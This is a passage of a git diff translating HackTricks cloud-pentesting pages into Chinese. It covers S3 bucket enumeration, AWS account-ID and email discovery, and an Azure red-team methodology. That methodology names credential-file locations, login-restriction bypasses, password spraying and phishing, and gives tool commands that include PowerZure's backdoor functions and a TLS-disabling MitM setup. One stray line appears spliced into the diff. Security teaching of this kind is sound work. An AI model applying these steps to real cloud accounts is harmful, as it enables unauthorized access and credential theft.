-# Create permutations based in a list with the domains and subdomains to attack
+# 创建基于域名和子域名的排列列表进行攻击
 goaltdns -l /tmp/words-hosts-s3.txt -w /tmp/words-s3.txt -o /tmp/final-words-s3.txt.temp
-## The previous tool is specialized increating permutations for subdomains, lets filter that list
-### Remove lines ending with "."
+## 之前的工具专门用于创建子域名的排列,让我们过滤该列表
+### 移除以 "." 结尾的行
 cat /tmp/final-words-s3.txt.temp | grep -Ev "\.$" > /tmp/final-words-s3.txt.temp2
-### Create list without TLD
+### 创建没有 TLD 的列表
 cat /tmp/final-words-s3.txt.temp2 | sed -E 's/\.[a-zA-Z0-9]+$//' > /tmp/final-words-s3.txt.temp3
-### Create list without dots
+### 创建没有点的列表
 cat /tmp/final-words-s3.txt.temp3 | tr -d "." > /tmp/final-words-s3.txt.temp4
-### Create list without hyphens
+### 创建没有连字符的列表
 cat /tmp/final-words-s3.txt.temp3 | tr "." "-" > /tmp/final-words-s3.txt.temp5
 
-## Generate the final wordlist
+## 生成最终单词列表
 cat /tmp/final-words-s3.txt.temp2 /tmp/final-words-s3.txt.temp3 /tmp/final-words-s3.txt.temp4 /tmp/final-words-s3.txt.temp5 | grep -v -- "-\." | awk '{print tolower($0)}' | sort -u > /tmp/final-words-s3.txt
 
-## Call s3scanner
+## 调用 s3scanner
 s3scanner --threads 100 scan --buckets-file /tmp/final-words-s3.txt  | grep bucket_exists
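# Hypothetical follow-up (bucket name is a placeholder): anonymously sanity-check a hit from the scan above
aws s3 ls s3://<discovered-bucket-name> --no-sign-request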
 
-#### Loot S3 Buckets +#### 获取 S3 桶 -Given S3 open buckets, [**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) can automatically **search for interesting information**. +给定 S3 开放桶,[**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) 可以自动**搜索有趣的信息**。 -### Find the Region +### 查找区域 -You can find all the supported regions by AWS in [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html) +你可以在 [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html) 找到 AWS 支持的所有区域。 -#### By DNS - -You can get the region of a bucket with a **`dig`** and **`nslookup`** by doing a **DNS request of the discovered IP**: +#### 通过 DNS +你可以通过**`dig`** 和 **`nslookup`** 获取桶的区域,方法是对发现的 IP 进行**DNS 请求**: ```bash dig flaws.cloud ;; ANSWER SECTION: @@ -96,31 +95,29 @@ nslookup 52.218.192.11 Non-authoritative answer: 11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com. ``` +检查解析的域名是否包含“website”。\ +您可以通过访问以下地址访问静态网站:`flaws.cloud.s3-website-us-west-2.amazonaws.com`\ +或者您可以通过访问以下地址访问存储桶:`flaws.cloud.s3-us-west-2.amazonaws.com` -Check that the resolved domain have the word "website".\ -You can access the static website going to: `flaws.cloud.s3-website-us-west-2.amazonaws.com`\ -or you can access the bucket visiting: `flaws.cloud.s3-us-west-2.amazonaws.com` +#### 通过尝试 -#### By Trying - -If you try to access a bucket, but in the **domain name you specify another region** (for example the bucket is in `bucket.s3.amazonaws.com` but you try to access `bucket.s3-website-us-west-2.amazonaws.com`, then you will be **indicated to the correct location**: +如果您尝试访问一个存储桶,但在**域名中指定了另一个区域**(例如存储桶在`bucket.s3.amazonaws.com`,但您尝试访问`bucket.s3-website-us-west-2.amazonaws.com`,那么您将被**指向正确的位置**: ![](<../../../images/image (106).png>) -### Enumerating the bucket +### 枚举存储桶 -To test the openness of the bucket a user can just enter the URL in their web browser. A private bucket will respond with "Access Denied". A public bucket will list the first 1,000 objects that have been stored. +要测试存储桶的开放性,用户只需在其网页浏览器中输入URL。私有存储桶将响应“访问被拒绝”。公共存储桶将列出前1,000个已存储的对象。 -Open to everyone: +对所有人开放: ![](<../../../images/image (201).png>) -Private: +私有: ![](<../../../images/image (83).png>) -You can also check this with the cli: - +您还可以通过cli检查此内容: ```bash #Use --no-sign-request for check Everyones permissions #Use --profile to indicate the AWS profile(keys) that youwant to use: Check for "Any Authenticated AWS User" permissions @@ -128,22 +125,18 @@ You can also check this with the cli: #Opcionally you can select the region if you now it aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile ] [ --recursive] [--region us-west-2] ``` +如果存储桶没有域名,在尝试枚举时,**只需输入存储桶名称**,而不是整个 AWSs3 域名。示例: `s3://` -If the bucket doesn't have a domain name, when trying to enumerate it, **only put the bucket name** and not the whole AWSs3 domain. Example: `s3://` - -### Public URL template - +### 公共 URL 模板 ``` https://{user_provided}.s3.amazonaws.com ``` +### 从公共桶获取账户ID -### Get Account ID from public Bucket - -It's possible to determine an AWS account by taking advantage of the new **`S3:ResourceAccount`** **Policy Condition Key**. This condition **restricts access based on the S3 bucket** an account is in (other account-based policies restrict based on the account the requesting principal is in).\ -And because the policy can contain **wildcards** it's possible to find the account number **just one number at a time**. 
- -This tool automates the process: +可以通过利用新的 **`S3:ResourceAccount`** **策略条件键** 来确定一个AWS账户。这个条件 **基于账户所在的S3桶限制访问**(其他基于账户的策略是基于请求主体所在的账户)。\ +由于策略可以包含 **通配符**,因此可以 **一次找到一个数字** 来查找账户号码。 +这个工具自动化了这个过程: ```bash # Installation pipx install s3-account-search @@ -153,13 +146,11 @@ s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket # With an object s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket/path/to/object.ext ``` +这种技术同样适用于 API Gateway URLs、Lambda URLs、Data Exchange 数据集,甚至可以获取标签的值(如果你知道标签键)。你可以在 [**原始研究**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) 和工具 [**conditional-love**](https://github.com/plerionhq/conditional-love/) 中找到更多信息,以自动化此利用。 -This technique also works with API Gateway URLs, Lambda URLs, Data Exchange data sets and even to get the value of tags (if you know the tag key). You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. - -### Confirming a bucket belongs to an AWS account - -As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)**, if you have permissions to list a bucket** it’s possible to confirm an accountID the bucket belongs to by sending a request like: +### 确认一个桶属于 AWS 账户 +正如在 [**这篇博客文章**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/) 中解释的那样,**如果你有列出桶的权限**,可以通过发送类似以下请求来确认桶所属的 accountID: ```bash curl -X GET "[bucketname].amazonaws.com/" \ -H "x-amz-expected-bucket-owner: [correct-account-id]" @@ -167,41 +158,34 @@ curl -X GET "[bucketname].amazonaws.com/" \ ... ``` +如果错误是“访问被拒绝”,则意味着账户 ID 错误。 -If the error is an “Access Denied” it means that the account ID was wrong. - -### Used Emails as root account enumeration - -As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/), it's possible to check if an email address is related to any AWS account by **trying to grant an email permissions** over a S3 bucket via ACLs. 
If this doesn't trigger an error, it means that the email is a root user of some AWS account: +### 使用电子邮件作为根账户枚举 +正如在[**这篇博客文章**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)中所解释的,可以通过**尝试授予电子邮件对 S3 存储桶的权限**来检查某个电子邮件地址是否与任何 AWS 账户相关。如果这没有触发错误,则意味着该电子邮件是某个 AWS 账户的根用户: ```python s3_client.put_bucket_acl( - Bucket=bucket_name, - AccessControlPolicy={ - 'Grants': [ - { - 'Grantee': { - 'EmailAddress': 'some@emailtotest.com', - 'Type': 'AmazonCustomerByEmail', - }, - 'Permission': 'READ' - }, - ], - 'Owner': { - 'DisplayName': 'Whatever', - 'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef' - } - } +Bucket=bucket_name, +AccessControlPolicy={ +'Grants': [ +{ +'Grantee': { +'EmailAddress': 'some@emailtotest.com', +'Type': 'AmazonCustomerByEmail', +}, +'Permission': 'READ' +}, +], +'Owner': { +'DisplayName': 'Whatever', +'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef' +} +} ) ``` - -## References +## 参考文献 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - [https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/](https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md index 7978eff36..f034cd7b7 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md @@ -1,25 +1,21 @@ -# AWS - SNS Unauthenticated Enum +# AWS - SNS 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} ## SNS -For more information about SNS check: +有关 SNS 的更多信息,请查看: {{#ref}} ../aws-services/aws-sns-enum.md {{#endref}} -### Open to All +### 对所有人开放 -When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic: +当您从网络控制台配置 SNS 主题时,可以指示 **每个人都可以发布和订阅** 该主题:
-So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**. +因此,如果您 **找到账户内主题的 ARN**(或暴力破解潜在的主题名称),您可以 **检查** 是否可以 **发布** 或 **订阅** **它们**。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md index a5006a63b..af874b9ff 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md @@ -1,27 +1,21 @@ -# AWS - SQS Unauthenticated Enum +# AWS - SQS 未认证枚举 {{#include ../../../banners/hacktricks-training.md}} ## SQS -For more information about SQS check: +有关 SQS 的更多信息,请查看: {{#ref}} ../aws-services/aws-sqs-and-sns-enum.md {{#endref}} -### Public URL template - +### 公共 URL 模板 ``` https://sqs.[region].amazonaws.com/[account-id]/{user_provided} ``` +### 检查权限 -### Check Permissions - -It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them. +可能会错误配置 SQS 队列策略,并授予 AWS 中的所有人发送和接收消息的权限,因此如果您获得队列的 ARN,请尝试访问它们。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/README.md b/src/pentesting-cloud/azure-security/README.md index 9d2de65fc..9db2ec363 100644 --- a/src/pentesting-cloud/azure-security/README.md +++ b/src/pentesting-cloud/azure-security/README.md @@ -2,86 +2,85 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 {{#ref}} az-basic-information/ {{#endref}} -## Azure Pentester/Red Team Methodology +## Azure 渗透测试/红队方法论 -In order to audit an AZURE environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal Azure services and **external services** connected. +为了审计 AZURE 环境,了解以下内容非常重要:使用了哪些 **服务**,暴露了什么,谁有 **访问权限**,以及内部 Azure 服务和 **外部服务** 是如何连接的。 -From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that: +从红队的角度来看,**攻陷 Azure 环境的第一步**是设法获取一些 Azure AD 的 **凭证**。以下是一些获取凭证的思路: -- **Leaks** in github (or similar) - OSINT -- **Social** Engineering -- **Password** reuse (password leaks) -- Vulnerabilities in Azure-Hosted Applications - - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint - - **Local File Read** - - `/home/USERNAME/.azure` - - `C:\Users\USERNAME\.azure` - - The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text** - - The file **`azureProfile.json`** contains **info** about logged user. - - **`az logout`** removes the token. - - Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\ - Use `Disconnect-AzAccount` to remove them. 
-- 3rd parties **breached** -- **Internal** Employee -- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App) - - [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) -- [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) +- GitHub(或类似平台)中的 **泄露** - OSINT +- **社交** 工程 +- **密码** 重用(密码泄露) +- Azure 托管应用中的漏洞 +- [**服务器端请求伪造**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) 访问元数据端点 +- **本地文件读取** +- `/home/USERNAME/.azure` +- `C:\Users\USERNAME\.azure` +- 在 `az cli` 2.30 之前的 **`accessTokens.json`** 文件 - 存储 **访问令牌** 为明文 +- **`azureProfile.json`** 文件包含有关已登录用户的 **信息**。 +- **`az logout`** 移除令牌。 +- 较旧版本的 **`Az PowerShell`** 将 **访问令牌** 以 **明文** 存储在 **`TokenCache.dat`** 中。它还将 **ServicePrincipalSecret** 以 **明文** 存储在 **`AzureRmContext.json`** 中。可以使用 cmdlet **`Save-AzContext`** 来 **存储** **令牌**。\ +使用 `Disconnect-AzAccount` 来移除它们。 +- 第三方 **被攻破** +- **内部** 员工 +- [**常见钓鱼**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology)(凭证或 Oauth 应用) +- [设备代码认证钓鱼](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) +- [Azure **密码喷洒**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) -Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it: +即使您 **没有攻陷任何用户** 在您攻击的 Azure 租户中,您仍然可以 **收集一些信息**: {{#ref}} az-unauthenticated-enum-and-initial-entry/ {{#endref}} > [!NOTE] -> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: +> 在您成功获取凭证后,您需要知道 **这些凭证属于谁**,以及 **他们可以访问什么**,因此您需要进行一些基本的枚举: -## Basic Enumeration +## 基本枚举 > [!NOTE] -> Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself. +> 请记住,枚举中 **最嘈杂** 的部分是 **登录**,而不是枚举本身。 ### SSRF -If you found a SSRF in a machine inside Azure check this page for tricks: +如果您在 Azure 内部的机器上发现了 SSRF,请查看此页面以获取技巧: {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf {{#endref}} -### Bypass Login Conditions +### 绕过登录条件
-In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place: +在您拥有一些有效凭证但无法登录的情况下,以下是一些可能存在的常见保护措施: -- **IP whitelisting** -- You need to compromise a valid IP -- **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least) -- **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses. -- You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed +- **IP 白名单** -- 您需要攻陷一个有效的 IP +- **地理限制** -- 找到用户居住的地方或公司的办公室位置,并获取来自同一城市(或至少同一国家)的 IP +- **浏览器** -- 可能只允许某些操作系统(Windows、Linux、Mac、Android、iOS)中的浏览器。找出受害者/公司使用的操作系统。 +- 您还可以尝试 **攻陷服务主体凭证**,因为它们通常限制较少,登录审核也较少。 -After bypassing it, you might be able to get back to your initial setup and you will still have access. +绕过后,您可能能够返回到初始设置,并且仍然可以访问。 -### Subdomain Takeover +### 子域名接管 - [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/) ### Whoami > [!CAUTION] -> Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section. +> 学习 **如何安装** az cli、AzureAD 和 Az PowerShell 在 [**Az - Entra ID**](az-services/az-azuread.md) 部分。 -One of the first things you need to know is **who you are** (in which environment you are): +您需要了解的第一件事是 **您是谁**(您处于哪个环境中): {{#tabs }} {{#tab name="az cli" }} - ```bash az account list az account tenant list # Current tenant info @@ -90,22 +89,18 @@ az ad signed-in-user show # Current signed-in user az ad signed-in-user list-owned-objects # Get owned objects by current user az account management-group list #Not allowed by default ``` - {{#endtab }} {{#tab name="AzureAD" }} - ```powershell #Get the current session state Get-AzureADCurrentSessionInfo #Get details of the current tenant Get-AzureADTenantDetail ``` - {{#endtab }} {{#tab name="Az PowerShell" }} - ```powershell # Get the information about the current context (Account, Tenant, Subscription etc.) Get-AzContext @@ -121,53 +116,49 @@ Get-AzResource Get-AzRoleAssignment # For all users Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user ``` - {{#endtab }} {{#endtabs }} > [!CAUTION] -> Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**. +> 其中一个枚举 Azure 的最重要命令是 **`Get-AzResource`** 来自 Az PowerShell,因为它可以让你 **了解当前用户可见的资源**。 > -> You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources" +> 你可以在 **网页控制台** 中获取相同的信息,访问 [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) 或搜索 "所有资源" -### ENtra ID Enumeration +### ENtra ID 枚举 -By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... 
(check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\ -You can find here a guide: +默认情况下,任何用户应该拥有 **足够的权限来枚举** 用户、组、角色、服务主体等信息...(查看 [默认 AzureAD 权限](az-basic-information/#default-user-permissions)).\ +你可以在这里找到指南: {{#ref}} az-services/az-azuread.md {{#endref}} > [!NOTE] -> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ -> In the following section you can check some ways to **enumerate some common services.** +> 现在你 **已经有了一些关于你凭据的信息**(如果你是红队,希望你 **没有被发现**)。是时候找出环境中正在使用哪些服务了。\ +> 在接下来的部分中,你可以查看一些 **枚举常见服务的方法**。 -## App Service SCM +## 应用服务 SCM -Kudu console to log in to the App Service 'container'. +Kudu 控制台用于登录到应用服务 '容器'。 ## Webshell -Use portal.azure.com and select the shell, or use shell.azure.com, for a bash or powershell. The 'disk' of this shell are stored as an image file in a storage-account. +使用 portal.azure.com 并选择 shell,或使用 shell.azure.com,进行 bash 或 powershell。此 shell 的 '磁盘' 作为图像文件存储在存储帐户中。 ## Azure DevOps -Azure DevOps is separate from Azure. It has repositories, pipelines (yaml or release), boards, wiki, and more. Variable Groups are used to store variable values and secrets. +Azure DevOps 与 Azure 是分开的。它具有代码库、管道(yaml 或发布)、看板、维基等。变量组用于存储变量值和秘密。 -## Debug | MitM az cli - -Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending: +## 调试 | MitM az cli +使用参数 **`--debug`** 可以查看工具 **`az`** 发送的所有请求: ```bash az account management-group list --output table --debug ``` - -In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do: +为了对工具进行**MitM**并**手动检查所有请求**,您可以执行: {{#tabs }} {{#tab name="Bash" }} - ```bash export ADAL_PYTHON_SSL_NO_VERIFY=1 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 @@ -180,25 +171,21 @@ export HTTP_PROXY="http://127.0.0.1:8080" openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem ``` - {{#endtab }} {{#tab name="PS" }} - ```bash $env:ADAL_PYTHON_SSL_NO_VERIFY=1 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 $env:HTTPS_PROXY="http://127.0.0.1:8080" $env:HTTP_PROXY="http://127.0.0.1:8080" ``` - {{#endtab }} {{#endtabs }} -## Automated Recon Tools +## 自动化侦察工具 ### [**ROADRecon**](https://github.com/dirkjanm/ROADtools) - ```powershell cd ROADTools pipenv shell @@ -206,9 +193,7 @@ roadrecon auth -u test@corp.onmicrosoft.com -p "Welcome2022!" roadrecon gather roadrecon gui ``` - ### [Monkey365](https://github.com/silverhack/monkey365) - ```powershell Import-Module monkey365 Get-Help Invoke-Monkey365 @@ -216,9 +201,7 @@ Get-Help Invoke-Monkey365 -Detailed Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML ``` - ### [**Stormspotter**](https://github.com/Azure/Stormspotter) - ```powershell # Start Backend cd stormspotter\backend\ @@ -236,9 +219,7 @@ az login -u test@corp.onmicrosoft.com -p Welcome2022! python stormspotter\stormcollector\sscollector.pyz cli # This will generate a .zip file to upload in the frontend (127.0.0.1:9091) ``` - ### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound) - ```powershell # You need to use the Az PowerShell and Azure AD modules: $passwd = ConvertTo-SecureString "Welcome2022!" 
-AsPlainText -Force @@ -294,9 +275,7 @@ MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContribu ## All Azure AD Groups that are synchronized with On-Premise AD MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n ``` - ### [Azucar](https://github.com/nccgroup/azucar) - ```bash # You should use an account with at least read-permission on the assets you want to access git clone https://github.com/nccgroup/azucar.git @@ -309,17 +288,13 @@ PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials # resolve the TenantID for an specific username PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com ``` - ### [**MicroBurst**](https://github.com/NetSPI/MicroBurst) - ``` Import-Module .\MicroBurst.psm1 Import-Module .\Get-AzureDomainInfo.ps1 Get-AzureDomainInfo -folder MicroBurst -Verbose ``` - ### [**PowerZure**](https://github.com/hausec/PowerZure) - ```powershell Connect-AzAccount ipmo C:\Path\To\Powerzure.psd1 @@ -340,9 +315,7 @@ $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest # Administrator $ Create-Backdoor, Execute-Backdoor ``` - ### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner) - ```powershell #Get-GraphTokens @@ -398,9 +371,4 @@ Get-TenantID -Domain #Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams. Invoke-GraphRunner -Tokens $tokens ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-basic-information/README.md b/src/pentesting-cloud/azure-security/az-basic-information/README.md index a600b66dc..08db24c18 100644 --- a/src/pentesting-cloud/azure-security/az-basic-information/README.md +++ b/src/pentesting-cloud/azure-security/az-basic-information/README.md @@ -1,376 +1,372 @@ -# Az - Basic Information +# Az - 基本信息 {{#include ../../../banners/hacktricks-training.md}} -## Organization Hierarchy +## 组织层级

![](https://www.tunecom.be/stg_ba12f/wp-content/uploads/2020/01/VDC-Governance-ManagementGroups-1536x716.png)

-### Management Groups +### 管理组 -- It can contain **other management groups or subscriptions**. -- This allows to **apply governance controls** such as RBAC and Azure Policy once at the management group level and have them **inherited** by all the subscriptions in the group. -- **10,000 management** groups can be supported in a single directory. -- A management group tree can support **up to six levels of depth**. This limit doesn’t include the root level or the subscription level. -- Each management group and subscription can support **only one parent**. -- Even if several management groups can be created **there is only 1 root management group**. - - The root management group **contains** all the **other management groups and subscriptions** and **cannot be moved or deleted**. -- All subscriptions within a single management group must trust the **same Entra ID tenant.** +- 它可以包含**其他管理组或订阅**。 +- 这允许在管理组级别**应用治理控制**,如RBAC和Azure策略,并让所有组内的订阅**继承**这些控制。 +- **单个目录**最多可以支持**10,000个管理组**。 +- 管理组树可以支持**最多六层深度**。此限制不包括根级别或订阅级别。 +- 每个管理组和订阅只能支持**一个父级**。 +- 即使可以创建多个管理组,**只有一个根管理组**。 +- 根管理组**包含**所有**其他管理组和订阅**,并且**无法移动或删除**。 +- 单个管理组内的所有订阅必须信任**相同的Entra ID租户**。
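
As a quick, hedged sketch of how this hierarchy is usually enumerated with az cli (assuming the current principal has at least read access somewhere in the tree; `MyManagementGroup` is a placeholder name):

```bash
# List the management groups the current identity can see
az account management-group list --output table

# Show one management group and expand its children (nested groups and subscriptions)
az account management-group show --name MyManagementGroup --expand --recurse
```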

![](https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png)

-### Azure Subscriptions +### Azure 订阅 -- It’s another **logical container where resources** (VMs, DBs…) can be run and will be billed. -- Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions. -- It **trust only one Entra ID** directory -- **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription +- 这是另一个**逻辑容器,资源**(虚拟机、数据库等)可以在其中运行并计费。 +- 它的**父级**始终是**管理组**(可以是根管理组),因为订阅不能包含其他订阅。 +- 它**仅信任一个Entra ID**目录。 +- 在订阅级别(或其任何父级)应用的**权限**会**继承**到订阅内的所有资源。 -### Resource Groups +### 资源组 -[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) A resource group is a **container** that holds **related resources** for an Azure solution. The resource group can include all the resources for the solution, or only those **resources that you want to manage as a group**. Generally, add **resources** that share the **same lifecycle** to the same resource group so you can easily deploy, update, and delete them as a group. +[来自文档:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-python?tabs=macos#what-is-a-resource-group) 资源组是一个**容器**,用于保存Azure解决方案的**相关资源**。资源组可以包括解决方案的所有资源,或仅包括您希望作为一组管理的**资源**。通常,将**共享相同生命周期**的**资源**添加到同一资源组,以便您可以轻松地作为一组进行部署、更新和删除。 -All the **resources** must be **inside a resource group** and can belong only to a group and if a resource group is deleted, all the resources inside it are also deleted. +所有的**资源**必须**在资源组内**,并且只能属于一个组,如果资源组被删除,组内的所有资源也会被删除。
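
A minimal az cli sketch to map this containment chain (subscription → resource group → resources); `myResourceGroup` is a placeholder and read access at the relevant scope is assumed:

```bash
# Subscriptions visible to the current identity
az account list --output table

# Resource groups in the currently selected subscription
az group list --output table

# Resources contained in one resource group
az resource list --resource-group myResourceGroup --output table
```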

![](https://i0.wp.com/azuredays.com/wp-content/uploads/2020/05/org.png?resize=748%2C601&ssl=1)

-### Azure Resource IDs +### Azure 资源 ID -Every resource in Azure has an Azure Resource ID that identifies it. +Azure 中的每个资源都有一个 Azure 资源 ID 来标识它。 -The format of an Azure Resource ID is as follows: +Azure 资源 ID 的格式如下: - `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}` -For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this: +对于在资源组`myResourceGroup`下,订阅 ID 为`12345678-1234-1234-1234-123456789012`的名为 myVM 的虚拟机,Azure 资源 ID 如下所示: - `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM` -## Azure vs Entra ID vs Azure AD Domain Services +## Azure vs Entra ID vs Azure AD 域服务 ### Azure -Azure is Microsoft’s comprehensive **cloud computing platform, offering a wide range of services**, including virtual machines, databases, artificial intelligence, and storage. It acts as the foundation for hosting and managing applications, building scalable infrastructures, and running modern workloads in the cloud. Azure provides tools for developers and IT professionals to create, deploy, and manage applications and services seamlessly, catering to a variety of needs from startups to large enterprises. +Azure 是微软的综合**云计算平台,提供广泛的服务**,包括虚拟机、数据库、人工智能和存储。它作为托管和管理应用程序、构建可扩展基础设施以及在云中运行现代工作负载的基础。Azure 为开发人员和 IT 专业人员提供工具,以无缝创建、部署和管理应用程序和服务,满足从初创企业到大型企业的各种需求。 -### Entra ID (formerly Azure Active Directory) +### Entra ID(前称 Azure Active Directory) -Entra ID is a cloud-based **identity and access management servic**e designed to handle authentication, authorization, and user access control. It powers secure access to Microsoft services such as Office 365, Azure, and many third-party SaaS applications. With features like single sign-on (SSO), multi-factor authentication (MFA), and conditional access policies among others. +Entra ID 是一种基于云的**身份和访问管理服务**,旨在处理身份验证、授权和用户访问控制。它为 Microsoft 服务(如 Office 365、Azure 和许多第三方 SaaS 应用程序)提供安全访问。具有单点登录(SSO)、多因素身份验证(MFA)和条件访问策略等功能。 -### Entra Domain Services (formerly Azure AD DS) +### Entra 域服务(前称 Azure AD DS) -Entra Domain Services extends the capabilities of Entra ID by offering **managed domain services compatible with traditional Windows Active Directory environments**. It supports legacy protocols such as LDAP, Kerberos, and NTLM, allowing organizations to migrate or run older applications in the cloud without deploying 